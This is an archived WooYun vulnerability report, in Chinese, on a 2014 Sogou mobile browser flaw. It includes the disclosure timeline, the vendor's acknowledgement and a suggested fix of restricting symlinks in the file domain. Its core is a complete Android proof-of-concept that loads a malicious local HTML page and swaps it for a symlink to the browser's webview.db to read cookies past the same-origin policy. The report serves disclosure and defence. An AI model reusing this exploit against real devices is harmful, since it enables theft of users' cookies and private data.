乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-20: 细节已通知厂商并且等待厂商处理中 2014-05-20: 厂商已经确认,细节仅向厂商公开 2014-05-23: 细节向第三方安全合作伙伴开放 2014-07-14: 细节向核心白帽子及相关领域专家公开 2014-07-24: 细节向普通白帽子公开 2014-08-03: 细节向实习白帽子公开 2014-08-18: 细节向公众公开
搜狗手机浏览器逻辑缺陷可获取隐私信息
搜狗手机浏览器在file域下存在逻辑缺陷,导致可以用符号链接绕过同源策略,可以获取用户cookie等隐私信息等。
import android.net.Uri;import android.os.Bundle;import android.app.Activity;import android.content.Intent;public class MainActivity extends Activity { public final static String MY_PKG = "com.example.testsougou"; public final static String MY_TMP_DIR = "/data/data/" + MY_PKG + "/tmp/"; public final static String TARGET_PKG = "sogou.mobile.explorer"; public final static String TARGET_FILE_PATH = "/data/data/" + TARGET_PKG + "/databases/webview.db"; public final static String HTML = "<body>" + "<u>Wait a few seconds.</u>" + "<script>" + "var d = document;" + "function doitjs() {" + " var xhr = new XMLHttpRequest;" + " xhr.onload = function() {" + " var txt = xhr.responseText;" + " d.body.appendChild(d.createTextNode(txt));" + " alert(txt);" + " };" + " xhr.open('GET', d.URL);" + " xhr.send(null);" + "}" + "setTimeout(doitjs, 8000);" + "</script>" + "</body>"; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); doit(); } public void doit() { String HTML_PATH = MY_TMP_DIR + "A" + Math.random() + ".html"; try { // Create a malicious HTML cmdexec("mkdir " + MY_TMP_DIR); cmdexec("echo \"" + HTML + "\" > " + HTML_PATH); cmdexec("chmod -R 777 " + MY_TMP_DIR); Thread.sleep(1000); // Force Chrome to load the malicious HTML invokeChrome("file://" + HTML_PATH); Thread.sleep(4000); // Replace the HTML with a symlink to Chrome's Cookie file cmdexec("rm " + HTML_PATH); cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH); } catch (Exception e) {} } public void invokeChrome(String url) { Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url)); intent.setClassName(TARGET_PKG, "sogou.mobile.explorer.BrowserActivity"); startActivity(intent); } public void cmdexec(String cmd) { try { String[] tmp = new String[] {"/system/bin/sh", "-c", cmd}; Runtime.getRuntime().exec(tmp); } catch (Exception e) {} }}
对file域下符号链接进行限制
危害等级:高
漏洞Rank:10
确认时间:2014-05-20 14:07
收到,感谢支持,欢迎到SGSRC提交漏洞!
暂无